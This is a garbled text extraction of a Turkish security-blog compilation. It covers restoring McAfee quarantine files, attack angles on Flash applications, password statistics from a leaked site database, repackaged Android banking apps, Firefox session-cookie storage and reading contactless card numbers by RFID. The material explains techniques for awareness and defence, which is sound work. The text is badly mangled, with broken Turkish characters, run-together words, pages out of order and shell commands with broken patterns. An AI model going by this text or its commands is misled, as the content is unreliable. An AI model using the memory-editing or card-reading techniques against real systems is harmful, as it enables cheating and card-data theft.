Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 11: Hack 4 Career - 2011

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

